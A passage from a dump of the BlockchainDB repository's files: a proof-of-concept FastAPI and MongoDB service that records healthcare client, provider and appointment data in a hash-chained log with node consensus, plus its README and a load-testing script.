protected](\"/confirm-forgot-password\", status_code=status.HTTP_200_OK)\ndef confirm_forgot_password(user_confirm_forgot_password: ConfirmForgotPassword):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = user_confirm_forgot_password.username\n aws_cognito.add_custom_attributes(email=user_confirm_forgot_password.username)\n\n aws_cognito.confirm_forgot_password(user_confirm_forgot_password.verification_code,\n user_confirm_forgot_password.new_password)\n" }, { "alpha_fraction": 0.7391692996025085, "alphanum_fraction": 0.7525681257247925, "avg_line_length": 45.65277862548828, "blob_id": "87ee92783949a702719563af91017241623b6f39", "content_id": "181cddfd917bf5727682824c7f09861bdc22289d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6717, "license_type": "permissive", "max_line_length": 266, "num_lines": 144, "path": "/README.md", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "- [1. Description](#1-description)\n- [2. Required Programs](#2-required-programs)\n- [3. How it works](#3-how-it-works)\n- [4. Running Example Locally](#4-running-example-locally)\n - [4.1. Without Docker](#41-without-docker)\n - [4.2. With Docker](#42-with-docker)\n- [5. Running Example on AWS](#5-running-example-on-aws)\n- [6. Points of Improvement/Potential next steps](#6-points-of-improvementpotential-next-steps)\n- [7. Related links](#7-related-links)\n\n## 1. Description\n\nThe idea behind this project was to be a proof of concept for using a blockchain\nas a means to create an immutable datastore. The blockchain in this case would act\nsimilar to the transaction log in a traditional sql database except that it would \nact as a record only and not a means to rebuild the current state of the database.\n\nThe example is built using FASTApi and the blockchainDB library exposes several FASTApi endpoints that can be integration into any other future examples.\n\n## 2. Required Programs\n\n- Docker\n- Python\n- MongoDB Compass (Optional, but makes things easier)\n- AWS CLI\n\nFor setup instructions see [related links](#7-related-links)\n\n## 3. How it works\n\nThe blockchain database works by adding an entry to the blockchain and to a specific \ndocument collection every time a transaction is committed. Each block to be committed\nrequires a single primary key field as it is used to determine if a block with that\nsame key has been created previously as it tags all new blocks with no existing key\nas a 'CREATE' entry and then any future block as an 'EDIT' block. It will throw an\nexception if another 'CREATE' block with the same key is attempted to be committed.\nAfter a candidate block has been created, it will confer with any linked nodes to \ndetermine if there is any other commits that have completed before the current commit\nand will reject the block if the other nodes do not agree on the generated hash. If it\nsucceeds, the block will be added to the chain and the data to the respective collection and the function will return true. If not, the function will return false.\nFor each 'EDIT' operation, a flag will be set on each data collection entity with a matching key that will mark all preceding data as superceeded. \n\nThis database recycles the query language used by MongoDB and allows the user of this \nlibrary to query the database based upon that syntax. There is a current limitation in that it will only return data with the superceeded flag being false. If there is\ndata found for the search, each returned entity will be verified against the blockchain prior to return to the caller. If it fails to verify, the audit function\nwill return nothing.\n\n\n## 4. Running Example Locally\n\nThe example project can be run locally either with or without docker as described in\nthe following sections.\n\n### 4.1. Without Docker\n\n1. Navigate to root of example directory\n2. Setup a new python virtual environment\n ```\n python3 -m venv venv\n ```\n Activate the environment with the following command\n ```\n source venv/bin/activate\n ``` \n3. Install dependancies from requirements file\n ```\n pip3 install -r app/requirements.txt\n ```\n4. Start the fastapi development server \n\n ```\n export DATABASE='blockmedi',CONNECTION_STRING='mongodb connection string',NODES=['node ip addresses'],USER_POOL_ID='Cognito user pool ID',USER_POOL_WEB_CLIENT_ID='Cognito user pool web client id'\n\n uvicorn app.main:app --reload\n ```\n5. View swagger page to check that server has started at the following url\n ```\n http://127.0.0.1:8000/docs\n ```\n\n### 4.2. With Docker\n\nUsing docker compose makes this process easier and the docker compose file provided\nwith the example as it contains an image for a mongodb instance. The docker-compose configuration is slightly different from that of the environment when hosted on AWS as it uses an HA proxy instance as the load balancer instead of the AWS ALB. \n\n1. Start the docker instances\n ```\n docker-compose up --build --remove-orphans\n ```\n2. View swagger page to check that server has started at the following url\n ```\n https://127.0.0.1:5001/docs\n ```\n or \n ```\n https://127.0.0.1:5002/docs\n ```\n Target requests to the load balancer at\n ```\n https://127.0.0.1:5000\n ```\n\n## 5. Running Example on AWS\n\nRunning the example in AWS needs to have a fair number of supporting services to \nwork correctly. The AWS CLI needs to be setup for this to work properly. See the link to the AWS CLI in the [related links](#7-related-links) section for more information.\n\n1. Create base services using CloudFormation in the attached base.yml file. \n This will create cognito, the ECS cluster, the load balancers, related certificates, and VPC.\n ```\n aws cloudformation deploy \\\n --template-file base.yml \\\n --stack-name some-stack-name \\\n --capabilities CAPABILITY_IAM \\\n --parameter-overrides DNSName=testdomain\n ```\n2. Commit the code in the example to a repository of your choosing. This is to be able to build and deploy a task definition to the ECS cluster. It is easiest to use Github for this as its free and is easily integrated with codepipeline.\n3. Create the pipeline with CloudFormation\n ```\n aws cloudformation deploy \\\n --template-file appconfig.yml \\\n --capabilities CAPABILITY_IAM \n ```\n The above command will need to have the parameter overrides added as per what is \n in the appconfig.yml file. The secrets for github and the mongodb store will\n need to created manually in AWS.\n4. Add an A record in Route 53 to link your domain in AWS to the ALB. The hosted zone will need to be created before you can add a record. This would either need to be a new domain created or one transferred from another registrar.\n\n## 6. Points of Improvement/Potential next steps\n\n- Change to be agnostic of backing database. This could be a plugin based system or have a backing database built in.\n- The base library needs unit and integration tests added. Could be useful to have it set up in the pipeline or done as part of github/bitbucket/azure devops pipeline.\n- The means of voting is dependant on services from AWS, this would be better if it were independant of services provided by AWS.\n- There is a threading problem with using FASTApi and python for this type of project. Would be better to either resolve or move away from python. Would also be better to not be quite so dependant on FASTApi, could be good to use protobuf as a potential alternative.\n\n\n## 7. Related links\n\n- https://aws.amazon.com/cli/\n- https://www.docker.com/get-started\n- https://fastapi.tiangolo.com/\n- https://www.mongodb.com/cloud/atlas\n- https://www.python.org/downloads/\n- https://pydantic-docs.helpmanual.io/" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.6761229038238525, "avg_line_length": 23.941177368164062, "blob_id": "2db0955ad7200dee47b4e58722d645c416d4d889", "content_id": "009e5552ee4063b2b96acae7848b8ca14c5b5e5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "permissive", "max_line_length": 58, "num_lines": 17, "path": "/example/test/aws_service_discovery/service_discovery.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import boto3\nimport json\n\nclient = boto3.client('servicediscovery')\n\nservices = client.list_services()\n\nfor service in services['Services']:\n print(service)\n instances = client.list_instances(\n ServiceId=service['Id'],\n MaxResults=100\n )\n\n for instance in instances['Instances']:\n print(instance['Attributes']['AWS_INSTANCE_IPV4'])\n print(instance['Attributes']['AWS_INSTANCE_IPV4'])" }, { "alpha_fraction": 0.6562778353691101, "alphanum_fraction": 0.6651825308799744, "avg_line_length": 42.8671875, "blob_id": "d429db8d0c0432197977aac44a332253b6a384a9", "content_id": "459784e7d83034f035339b3054713dae105c3375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5615, "license_type": "permissive", "max_line_length": 100, "num_lines": 128, "path": "/example/app/api/client_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import uuid\nfrom typing import List\nfrom fastapi import Depends, APIRouter, status, HTTPException\nfrom .client_models import Client, LinkedProvider\nfrom .provider_models import Provider\nfrom .common_models import Appointment, AppointmentStatus\nfrom .blockchain import BlockchainDb\nfrom .util import verify_auth_header\n\n\napi = APIRouter(\n prefix=\"/api/client\",\n tags=[\"clients\"],\n dependencies=[Depends(BlockchainDb),Depends(verify_auth_header)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/{client_id}\", response_model=Client, status_code=status.HTTP_200_OK)\ndef get_client(client_id: str, database: BlockchainDb = Depends()):\n result = database.find_one('Client', {'clientId': client_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Client not found')\n\n return Client(**result)\n\[email protected](\"/{client_id}\", status_code=status.HTTP_200_OK)\ndef update_client(client_id: str, client: Client, database: BlockchainDb = Depends()):\n if client.clientId != client_id:\n raise HTTPException(status_code=400,\n detail='Client id in query parameter doesn\\'t match payload')\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\[email protected](\"/{client_id}/appointments\",\n response_model=List[Appointment],\n status_code=status.HTTP_200_OK)\ndef get_client_appointments(client_id: str, database: BlockchainDb = Depends()):\n result = database.find('Appointment', {'clientId': client_id})\n\n if result is None:\n return []\n\n return result\n\[email protected](\"/{client_id}/appointments/{appointment_id}\",\n response_model=Appointment,\n status_code=status.HTTP_200_OK)\ndef get_client_appointment(client_id: str, appointment_id: str, database: BlockchainDb = Depends()):\n result = database.find_one('Appointment',\n {'clientId': client_id, 'appointmentId': appointment_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/{client_id}/appointments\", status_code=status.HTTP_200_OK)\ndef add_client_appointment(client_id: str, appointment: Appointment,\n database: BlockchainDb = Depends()):\n if appointment.clientId != client_id:\n raise HTTPException(status_code=400,\n detail=f'Client id ({client_id}) in query \\\n parameter doesn\\'t match payload \\\n ({appointment.clientId}) \\\n {client_id == appointment.clientId}')\n #need to add protect so that only 1 create block can exist for a given ID\n appointment.appointmentId = str(uuid.uuid4())\n\n provider = Provider(**database.find_one('Provider', {'providerId': appointment.providerId}))\n client = Client(**database.find_one('Client', {'clientId': client_id}))\n\n if not any(linked_provider.providerId == provider.providerId\n for linked_provider in client.linkedProviders):\n client.linkedProviders.append(LinkedProvider(providerId=provider.providerId, \n hasAccess=True,\n providerName=f'{provider.name.firstName} {provider.name.lastName}'))\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\n database.commit_transaction(appointment, 'CREATE', 'Appointment',\n 'appointmentId', appointment.appointmentId)\n\[email protected](\"/{client_id}/linked-provider/{provider_id}/toggle\", status_code=status.HTTP_200_OK)\ndef toggle_client_linked_provider(client_id: str, provider_id: str,\n database: BlockchainDb = Depends()):\n\n client = Client(**database.find_one('Client', {'clientId': client_id}))\n\n for index, linked_provider in enumerate(client.linkedProviders):\n if linked_provider.providerId == provider_id:\n linked_provider.hasAccess = not linked_provider.hasAccess\n client.linkedProviders[index] = linked_provider\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\[email protected](\"/{client_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef update_client_appointment(client_id: str, appointment_id: str,\n appointment: Appointment, database: BlockchainDb = Depends()):\n if appointment.clientId != client_id or appointment.appointmentId != appointment_id:\n raise HTTPException(status_code=400,\n detail='Client id in query parameter doesn\\'t match payload')\n\n if appointment.status == AppointmentStatus.Completed \\\n or appointment.status == AppointmentStatus.Rejected:\n raise HTTPException(status_code=400,\n detail='Cannot update a completed or rejected appointment')\n\n result = database.commit_transaction(appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n if result is None:\n raise HTTPException(status_code=400, detail='Could not update appointment')\n\n return result\n\[email protected](\"/{client_id}/prescribed-treatments\", status_code=status.HTTP_200_OK)\ndef get_client_prescribed_treatments(client_id: str, database: BlockchainDb = Depends()):\n appointments = database.find('Appointment', { 'clientId' : client_id})\n\n if appointments is None:\n return []\n \n prescribed_treatments = []\n\n [prescribed_treatments.extend(appointment.prescribedTreatment) for appointment in appointments]\n\n return prescribed_treatments\n" }, { "alpha_fraction": 0.66150963306427, "alphanum_fraction": 0.6704172492027283, "avg_line_length": 21.935483932495117, "blob_id": "91cb53d7a010549902f8577071c78fd6340fc4dc", "content_id": "eb43a2f732ee5d539c2a5c9e78765daec7a0753a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2133, "license_type": "permissive", "max_line_length": 72, "num_lines": 93, "path": "/example/app/api/common_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Models that are shared between providers, clients and appointments\"\"\"\nfrom typing import List\nimport datetime\nfrom enum import Enum\nfrom pydantic import BaseModel, validator\n\nclass ProvidableTreatment(BaseModel):\n \"\"\"Model for Providable Treatment\"\"\"\n providableTreatmentId: str = str('')\n name: str\n description: str\n\nclass AppointmentStatus(Enum):\n \"\"\"Enum model for an appointment status\"\"\"\n Pending = 0\n Accepted = 1\n Rejected = 2\n Completed = 3\n InProgress = 4\n\nclass Provinces(Enum):\n \"\"\"Enum model for an province\"\"\"\n Ontario = 0\n Manitoba = 1\n Quebec = 2\n Newfoundland = 3\n Saskatchewan = 4\n PrinceEdwardIsland = 5\n BritishColumbia = 6\n NovaScotia = 7\n Yukon = 8\n NorthwestTerritories = 9\n Nunavut = 10\n NewBrunswick = 11\n\n\nclass Name(BaseModel):\n \"\"\"Model for Name\"\"\"\n firstName: str\n middleName: str\n lastName: str\n\n\nclass PhoneNumbers(BaseModel):\n \"\"\"Model for Providable Treatment\"\"\"\n mobile: str\n home: str\n work: str\n\n\nclass Address(BaseModel):\n \"\"\"Model for Address\"\"\"\n addressId: str = str('')\n unit: str\n streetAddress: str\n city: str\n province: Provinces\n country: str\n postalCode: str\n\n @validator('country')\n def country_must_be_canada(cls, value):\n if value.lower() != 'canada':\n raise ValueError(\"Only Canada is supported as a country.\")\n return value\n\n\nclass PrescribedTreatment(ProvidableTreatment):\n treatmentFrequency: str\n startDate: datetime.datetime\n endDate: datetime.datetime\n\n\nclass Notes(BaseModel):\n noteId: str = str('')\n createdDate: datetime.datetime\n note: str\n\n\nclass Appointment(BaseModel):\n \"\"\"Model for Appointment\"\"\"\n appointmentId: str = str('')\n clientId: str\n providerId: str\n reasonForAppointment: str\n address: Address\n date: datetime.datetime\n status: AppointmentStatus = AppointmentStatus.Pending\n attended: bool\n cancellationReason: str = str('')\n requestedTreatments: List[ProvidableTreatment]\n prescribedTreatments: List[PrescribedTreatment] = []\n notes: List[Notes] = []\n" }, { "alpha_fraction": 0.5983520150184631, "alphanum_fraction": 0.6010986566543579, "avg_line_length": 35.407691955566406, "blob_id": "04867aa1726a2991605b73a55ca67022160060bb", "content_id": "6136ac250f0ba4d6db4965d8c1485a3823ae87de", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4733, "license_type": "permissive", "max_line_length": 98, "num_lines": 130, "path": "/example/app/api/blockchain/mongo.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Class to handle mongodb database\"\"\"\n\nimport os\nimport logging\nfrom pymongo import MongoClient\nfrom .models import Block, generate_audit_block\n\n\nclass CreateBlockAlreadyExistsError(Exception):\n def __init__(self, data_key_field_name, data_key_value):\n self.message = f'Block of type CREATE cannot be created. \\\n Key: {data_key_field_name} and Id: {data_key_value} already exists'\n\n\nclass MongoDb:\n \"\"\"\n Wrapper for mongodb and performs some basic operations on the database\n \"\"\"\n def __init__(self):\n if 'CONNECTION_STRING' in os.environ:\n self.connection_string = os.environ['CONNECTION_STRING']\n else:\n raise ValueError('CONNECTION_STRING is required as an environment variable')\n\n if 'DATABASE' in os.environ:\n self.database_name = os.environ['DATABASE']\n else:\n raise ValueError('DATABASE is required as an environment variable')\n\n def get_latest_hash(self):\n latest_block = self.__get_database().Blocks.find_one({}, sort=[('_id', -1)])\n\n if latest_block is None:\n return ''\n\n return latest_block['hash']\n\n def commit_block(self, block: Block):\n database = self.__get_database()\n naked_block = block.get_naked_block()\n\n if database.Blocks.count() == 0:\n logging.info(\"Genisys block created\")\n database.Blocks.insert_one(vars(naked_block))\n return\n\n data_block = block.get_data_block()\n data_key_value = str(block.data_key_value)\n\n existing_block_query = {block.data_key_field_name: data_key_value, \"block_type\": 'CREATE'}\n existing_collection_block_result = list(self.__get_database()[data_block.collection]\n .find(filter=existing_block_query))\n\n if len(existing_collection_block_result) > 0 and block.block_type == 'CREATE':\n raise CreateBlockAlreadyExistsError(block.data_key_field_name, data_key_value)\n\n existing_block_query_updated = {\"$set\": {\"superceded\": True}}\n database[data_block.collection].update({block.data_key_field_name: data_key_value},\n existing_block_query_updated, multi=True)\n\n database.Blocks.insert_one(vars(naked_block))\n database[data_block.collection].insert_one(data_block.get_document())\n\n def get_block_count(self):\n database = self.__get_database()\n return database.Blocks.count()\n\n def __get_database(self):\n client = MongoClient(self.connection_string)\n return client[self.database_name]\n\n def __find_base(self, collection_name, query):\n database = self.__get_database()\n\n query['superceded'] = False\n\n return database[collection_name].find(filter=query, projection={'block_type': 0})\n\n def find_one(self, collection_name, query):\n result = self.__find_base(collection_name, query)\n sorted_result = list(result.sort([(\"_id\", -1)]).limit(1))\n\n if len(sorted_result) == 0:\n return None\n\n result = sorted_result[0]\n del result[\"_id\"]\n del result[\"superceded\"]\n\n return self.audit_result(result)\n\n def find(self, collection_name, query):\n results = list(self.__find_base(collection_name, query).sort([(\"_id\", -1)]))\n for result in results:\n del result[\"_id\"]\n del result[\"superceded\"]\n\n return self.audit_results(results)\n\n def audit_result(self, query_result):\n database = self.__get_database()\n\n block = database.Blocks.find_one(filter={\"hash\": query_result['hash_id']})\n\n proposed_hash = generate_audit_block(block['id'], query_result, block['block_type'],\n block['timestamp'], block['previous_hash'])\n\n if proposed_hash.hash == block['hash']:\n return query_result\n return None\n\n def audit_results(self, query_results):\n database = self.__get_database()\n results = []\n\n for result in query_results:\n block = database.Blocks.find_one(filter={\"hash\": result['hash_id']})\n\n proposed_hash = generate_audit_block(block['id'], result, block['block_type'],\n block['timestamp'], block['previous_hash']).hash\n\n if proposed_hash == block['hash']:\n results.append(result)\n\n return results\n\n def get_blockchain_hash_links(self):\n block_hash_links = self.__get_database().Blocks.find(sort=[(\"_id\", -1)],\n projection={'hash': 1, 'previous_hash': 1, '_id': 0})\n return {elem['hash']: elem['previous_hash'] for elem in list(block_hash_links)}\n" }, { "alpha_fraction": 0.5930917263031006, "alphanum_fraction": 0.5975402593612671, "avg_line_length": 35.74519348144531, "blob_id": "48eceafa595e785c1dd04fd7ee67146b7b24faeb", "content_id": "cf2bde33c863fb5bcebb7043e52099f4d58cd820", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7643, "license_type": "permissive", "max_line_length": 99, "num_lines": 208, "path": "/src/blockchain/blockchain.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Implementation of the actual blockchain\"\"\"\n\nimport asyncio\nimport json\nimport os\nfrom datetime import datetime, timezone\nimport time\nimport logging\nimport requests\nimport boto3\nfrom injector import inject\nfrom .mongo import MongoDb\nfrom .models import Block, ProposedBlock, generate_block, generate_from_proposed_block\n\n\nclass Blockchain:\n \"\"\"Primary class to control the blockchain\"\"\"\n @inject\n def __init__(self):\n self.database = MongoDb()\n self.nodes = []\n\n if 'ENVIRONMENT' not in os.environ or os.environ['ENVIRONMENT'] == 'local' \\\n or os.environ['ENVIRONMENT'] == 'development':\n if 'NODES' in os.environ and len(os.environ['NODES']) > 0:\n self.nodes = json.loads(os.environ['NODES'])\n else:\n self.nodes = get_aws_nodes()\n\n logging.info(f'Using nodes: {self.nodes}')\n\n count = self.database.get_block_count()\n if count == 0:\n self.__create_genesis_block()\n\n def __create_genesis_block(self):\n \"\"\"Creates the genesys block for the chain. This should only be called once\"\"\"\n self.__commit(Block([], 'GENISYS', '', '', '', '', '', ''))\n\n def commit_transaction(self, transaction, block_type, data_collection_name,\n data_key_field_name, data_key_value):\n \"\"\"Handles the commit for any transaction either create or edit\"\"\"\n retry_count = 3\n count = 0\n\n while count < retry_count:\n new_block = generate_block(transaction, block_type,\n datetime.now(timezone.utc).strftime(\"%Y-%m-%d %H:%M:%S %z\"),\n self.last_block, data_collection_name, data_key_field_name,\n data_key_value)\n\n logging.info(f'New block created with hash: {new_block.hash}')\n is_valid = self.validate_block(new_block)\n\n if is_valid:\n self.__commit(new_block)\n return True\n\n logging.info('Not enough successful results for block. Block rejected.')\n count += 1\n time.sleep(0.1 * count)\n return False\n\n def __commit(self, block: Block):\n \"\"\"\n Starts the process to add a block to the blockchain\n \"\"\"\n self.database.commit_block(block)\n return block\n\n def get_proposed_block_hash(self, proposed_block: ProposedBlock):\n \"\"\"\n Generates a block that is potentially to be added to the blockchain\n \"\"\"\n logging.debug(f'proposed: {proposed_block}')\n block = generate_from_proposed_block(proposed_block, self.last_block)\n logging.debug(block)\n return block.hash\n\n def get_new_block_hash(self, transaction, block_type, timestamp, data_collection_name,\n data_key_field_name, data_key_value):\n \"\"\"\n Generates a candidate block and calculates its hash\n \"\"\"\n logging.info(f'Previous hash: {self.last_block}')\n\n new_block = generate_block(transaction, block_type, timestamp,\n self.last_block, data_collection_name,\n data_key_field_name, data_key_value)\n\n logging.info(f'New block: {transaction}, {block_type}, {timestamp},\\\n {data_collection_name}, {data_key_field_name}, {data_key_value}')\n\n return new_block.hash\n\n def validate_block(self, block: Block):\n \"\"\"\n Dispatchs blocks for comparison against other nodes and determines\n the results\n \"\"\"\n if len(self.nodes) == 0:\n return True\n\n proposed_block = ProposedBlock(**vars(block))\n\n logging.info('Starting node conferral process')\n results = asyncio.run(self.validate_with_other_nodes(proposed_block))\n\n logging.info(f'Node conferral results: {results}')\n\n successful_nodes = []\n\n for result in results:\n logging.info(f'status code: {result.status_code} hash: {result.text}')\n logging.debug(f'Current hash: {block.hash} Conferral Node hash: {result.text}')\n\n if result.status_code == 200 and result.text == f'\"{block.hash}\"':\n logging.debug('Adding successful validated node')\n successful_nodes.append(result)\n\n logging.debug(f'Successful Nodes: {len(successful_nodes)}')\n logging.debug(f'All results: {len(results)}')\n logging.debug(f'Rate of success: {(len(successful_nodes) / len(results)) + 0.0}')\n\n return ((len(successful_nodes) / len(results)) + 0.0) > 0.75\n\n async def validate_with_other_nodes(self, proposed_block):\n \"\"\"\n Handles the coallation of the block validation requests\n \"\"\"\n logging.debug(f'Using nodes: {self.nodes}')\n\n outstanding_requests_tasks = [self.validate_with_other_node_request(node, proposed_block)\n for node in self.nodes]\n\n if len(outstanding_requests_tasks) == 0:\n return []\n\n return await asyncio.gather(*outstanding_requests_tasks)\n\n async def validate_with_other_node_request(self, node, proposed_block):\n \"\"\"\n Dispatchs the proposed block for other nodes to confirm the hash is valid\n \"\"\"\n logging.info(f'Attempting to confirm with node at address: \\\n {node}/api/blockchain/validate-block and payload: {proposed_block.json()}')\n\n return requests.post(f'{node}/api/blockchain/validate-block', data=proposed_block.json())\n\n def validate(self):\n \"\"\"\n Validates the blockchain itself to ensure that all nodes are accounted for and in order\n based upon the links from one block to the next. Similar to traversal of a linked list.\n \"\"\"\n hash_links = self.database.get_blockchain_hash_links()\n visited = {}\n\n if len(hash_links) == 0:\n return True\n\n list_keys = list(hash_links.keys())\n next_key = hash_links[list_keys[0]]\n visited[list_keys[0]] = True\n hash_links.pop(list_keys[0])\n\n while next_key != '':\n tmp_key = hash_links[next_key]\n hash_links.pop(next_key)\n next_key = tmp_key\n\n if len(hash_links) > 0:\n logging.error('Blockchain failed to validate at: ')\n return False\n\n logging.info(f'Blockchain failed to validate at: {datetime.timestamp()}')\n return True\n\n def find_one(self, collection_name, query):\n \"\"\"\n Wrapper to call to find a single node and its real value in the database\n \"\"\"\n return self.database.find_one(collection_name, query)\n\n def find(self, collection_name, query):\n \"\"\"\n Wrapper to call to find a multiple nodes and their real values in the database\n \"\"\"\n return self.database.find(collection_name, query)\n\n @property\n def last_block(self):\n return self.database.get_latest_hash()\n\n\ndef get_aws_nodes():\n client = boto3.client('servicediscovery')\n metadata_uri = os.environ['ECS_CONTAINER_METADATA_URI']\n container_metadata = requests.get(metadata_uri).json()\n container_ip = container_metadata['Networks'][0]['IPv4Addresses'][0]\n node_ips = []\n for service in client.list_services()['Services']:\n for instance in client.list_instances(\n ServiceId=service['Id'],\n MaxResults=100\n )['Instances']:\n if container_ip != instance['Attributes']['AWS_INSTANCE_IPV4']:\n node_ips.append(instance['Attributes']['AWS_INSTANCE_IPV4'])\n return node_ips\n" }, { "alpha_fraction": 0.7831325531005859, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 26.66666603088379, "blob_id": "3e241a2fdca0aa6b056f050ef99dd72b1c792e74", "content_id": "1bb0abf76d98b2fa0e80eea33663ffdb20e91328", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "permissive", "max_line_length": 63, "num_lines": 9, "path": "/example/app/dependencies.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Dependency injection configuration\"\"\"\n\nfrom injector import singleton\nfrom .api.blockchain import BlockchainDb\n\n\ndef configure_dependencies(binder):\n \"\"\"Service configurations\"\"\"\n binder.bind(BlockchainDb, to=BlockchainDb, scope=singleton)\n" }, { "alpha_fraction": 0.6191094517707825, "alphanum_fraction": 0.6359925866127014, "avg_line_length": 26.085426330566406, "blob_id": "df007890c02dc68907515f0fdc04bc97abca8323", "content_id": "9c8e814a0f0ed237d08602e32dc08a9b1cab100f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5390, "license_type": "permissive", "max_line_length": 154, "num_lines": 199, "path": "/example/test/load_testing/provider_mass_adder.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from pydantic import BaseModel, ValidationError, EmailStr, validator\nfrom typing import List\nfrom datetime import datetime\nimport random\nimport asyncio\nimport json\nimport requests\nimport logging\nimport uuid\nfrom enum import Enum\n\n\nclass Provinces(Enum):\n Ontario = 0\n Manitoba = 1\n Quebec = 2\n Newfoundland = 3\n Saskatchewan = 4\n PrinceEdwardIsland = 5\n BritishColumbia = 6\n NovaScotia = 7\n Yukon = 8\n NorthwestTerritories = 9\n Nunavut = 10\n NewBrunswick = 11\n\n\nclass Name(BaseModel):\n firstName: str\n middleName: str\n lastName: str\n\n\nclass PhoneNumbers(BaseModel):\n mobile: str\n home: str\n work: str\n\nclass ProvidableTreatment(BaseModel):\n name: str\n description: str\n\nclass Address(BaseModel):\n unit: str\n streetAddress: str\n city: str\n province: Provinces \n country: str\n postalCode: str\n\n @validator('country')\n def country_must_be_canada(cls, v):\n if v.lower() != 'canada':\n raise ValueError(\"Only Canada is supported as a country.\")\n return v\n\n\nclass Appointment(BaseModel):\n appointmentId: str = str(uuid.uuid4())\n clientId: str\n providerId: str\n reasonForAppointment: str\n address: Address\n date: datetime\n status: int \n attended: bool\n cancellationReason: str\n\nclass RegisterProvider(BaseModel):\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\n\nclass HelperEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n \n if isinstance(o, datetime):\n return o.isoformat()\n\n if isinstance(o, Provinces):\n return o.value\n\n return json.JSONEncoder.default(self, o)\n\ndef build_provider():\n name = get_name()\n\n number_of_addresses = random.randint(1, 5)\n number_of_providable_treatments = random.randint(1, 7)\n\n address = []\n providableTreatments = []\n\n for i in range(0, random.randint(1, 7)):\n address.append(get_address())\n\n for i in range(0, random.randint(1, 7)):\n providable_treatment = get_providable_treatments()\n treatment_exists = False\n\n for providableTreatment in providableTreatments:\n if providableTreatment.name == providable_treatment.name:\n treatment_exists = True\n\n if not treatment_exists:\n providableTreatments.append(providable_treatment)\n\n phone_numbers = get_phone_numbers()\n email = get_email(name)\n\n return RegisterProvider(**{\n 'username': email,\n 'password': 'Password!@3',\n 'name': name,\n 'phoneNumbers': phone_numbers,\n 'addresses': address,\n 'dateOfBirth': datetime(1950 + random.randint(0, 40), random.randint(1, 12), random.randint(1, 28)), \n 'providableTreatments':providableTreatments,\n 'email':email\n })\n\ndef get_phone_numbers():\n return PhoneNumbers(**{\n 'mobile': '1234567890',\n 'work': '1234567890',\n 'home': '1234567890'\n })\n\ndef get_email(name: Name):\n return f'{name.firstName}.{name.lastName}@monoper.io'\n\n\ndef get_name():\n first_names = ['john', 'sally', 'kate', 'samina', 'anne', 'will', 'catherine', 'ayla', 'kayla', 'katrina', 'rebecca', 'robert', 'sam', 'eric', 'greg']\n last_names = ['smythe', 'smith', 'johnson', 'wali', 'erikson', 'takamora', 'harper', 'miller', 'jones', 'davis', 'garcia']\n\n first_name = first_names[random.randint(0, len(first_names)-1)]\n middle_name = first_names[random.randint(0, len(first_names)-1)]\n last_name = last_names[random.randint(0, len(last_names)-1)]\n\n return Name(**{'firstName':first_name, 'middleName': middle_name, 'lastName': last_name})\n\n\ndef get_address():\n cities = ['toronto', 'vancouver', 'montreal', 'winnipeg', 'halifax', 'london', 'paris', 'huntsville']\n street_addresses = ['main', 'yonge', 'queen', 'dundas', 'lord', 'red', 'blue', 'ontario', 'durham']\n street_suffixes = ['street', 'avenue', 'boulevard', 'circle']\n\n unit = random.randint(0, 99)\n city = cities[random.randint(0, len(cities)-1)]\n street_address = street_addresses[random.randint(0, len(street_addresses)-1)]\n street_suffix = street_suffixes[random.randint(0, len(street_suffixes)-1)]\n postal_code = 'l1l1w2'\n\n return Address(**{\n 'unit': unit,\n 'streetAddress': f'{street_address} {street_suffix}',\n 'city': city,\n 'province': random.randint(0, 11),\n 'country': 'canada',\n 'postalCode': postal_code\n })\n\n\ndef get_providable_treatments():\n treatment_names = ['back massage', 'skin cleanse', 'general check up', 'blood testing', 'MRI scan', 'CT scan', 'cancer screening']\n\n treatment_name = treatment_names[random.randint(0, len(treatment_names)-1)]\n\n return ProvidableTreatment(**{\n 'name': treatment_name,\n 'description': treatment_name\n })\n\n\ndef create_provider():\n url = 'https://api.dev.blockmedisolutions.com/api/auth/register-provider'\n print(f'Using url: {url}')\n\n data = build_provider()\n\n json_data = json.dumps(data.dict(), cls=HelperEncoder)\n\n print(json_data)\n 